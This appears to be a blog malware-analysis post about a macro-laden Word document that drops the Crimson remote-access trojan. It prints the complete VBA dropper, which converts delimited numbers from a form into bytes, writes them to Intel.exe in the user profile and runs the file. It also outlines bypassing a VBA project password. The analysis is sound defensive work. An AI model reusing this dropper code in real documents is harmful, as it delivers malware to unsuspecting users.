I was a bit surprised while investigating this document the other day. It has been a while since I’ve seen a malicious document where the executable is dropped directly from the document and executed as a child process of it. This also means that if the executable was dropped directly from the document, it is buried somewhere and we should try to find it.
Any.run identifies the dropped executable as Crimson, a RAT designed to exfiltrate a variety of data. It was used in 2016 against Indian diplomatic and military resources (Proofpoint) but has also popped up as recently as August 2019. This blog post from Proofpoint shows quite a few similarities between my specimen and theirs.
First things first, let’s extract the macros (I used OfficeMalScanner). They were not obfuscated at all. Everything they would do was right out in the open. Here is the main one that does all of the heavy lifting. I’ll be splitting it up into three parts.
Public Sub Con() Dim BITy() As Byte Dim str() As String Dim Path As String Path = Environ$("USERPROFILE") & "\Intel.exe" str = Split(UserForm1.TextBox1.Text, "!") Dim Index As Double Index = 0 For Each arr In str ReDim Preserve BITy(Index) BITy(Index) = CByte(arr) Index = Index + 1 Next arr Create BITy End Sub
We can see the path where the executable will drop and what it will be named, although that variable doesn’t seem to be used in this function. Even more interesting is the next line with variable str. It is taking the text in UserForm1.TextBox1 and splitting it on the exclamation point. The for each loop takes those characters and converts them to bytes numbered 0 – 255 (CByte) and tosses them into BITy.
Public Sub Create(bit() As Byte) Dim Path1 As String Path1 = Environ$("USERPROFILE") & "\Intel.exe" Open Path1 For Binary Access Write As #1 Put #1, , bit Close 1 Run End Sub
Function Create is then fed the bytes from BITy. We can see the Path1 variable is similar to the one above, but in this case it is actually getting used. Path1 is opened as write access, the information is put there, and then closed. Function Run is then called.
Public Sub Run() Dim RunPath As Variant RunPath = Environ$("USERPROFILE") & "\Intel.exe" Dim RetVal RetVal = Shell(RunPath, 1) End Sub
Function Run will actually… well, run the binary we dropped in RunPath. Good ol’ Shell sticks out like a sore thumb.
We’ve seen other malicious documents make use of UserForms and text boxes before. In those cases, some long base-64 encoded strings were there and pieced together in the macro before they were executed by Powershell. Based on the macro analysis above, I don’t think that is going to be case here since that text is going to be dropped directly to disk and then executed. Let’s look and see what is in UserForm1.
Remember, to get in there, we’ll need to open the document. This means we’ll be prompted to ‘Enable Content’. At this point we can do one of two things.
- We can ‘Enable Content’ to trigger the macros and do some behavioral analysis to see parent/child process behaviors and see what files drop. After it has been opened, we can then press Alt+F11 to open the Microsoft VBA editor and investigate the macros. OR
- Use the vbashift trick as explained by @decalage2. While keeping the shift key on your keyboard pressed, open the document and also enable content. The shift key will disable automatic macro triggers. You can then press Alt+F11 to open the Microsoft VBA editor and examine the macros that way.
I chose option two and it worked like a charm… but the project is password protected.
This means we need to get rid of that password. Using the technique described here, I edited the file in a hex editor to bypass the project password, re-opened the document, ignored the errors, un-protected the project, saved the changes, and re-opened the document. Here are the results:
UserForm1 contains a string of characters interspersed with exclamation points. This makes sense considering the macro we investigated above (convenient, right?). That text gets split by the exclamation points, each is gathered into a variable, the variable gets dropped as a binary, and that dropped binary gets executed. In fact, if you take the first two numbers shown in UserForm1 (77 and 90), and convert them to ASCII, you’ll see they are the characters MZ.
Where does the dropped executable land?
As expected, Intel.exe gets dropped at C:\Users\[user account]\Intel.exe. It is also a child process of WINWORD.EXE.
What exactly does Intel.exe do? Looking at the Any.run output, we can see traffic headed 220.127.116.11. Following the TCP stream in Wireshark, commands (in blue) are sent from 18.104.22.168 and information (in red) is returned.
Thanks for reading!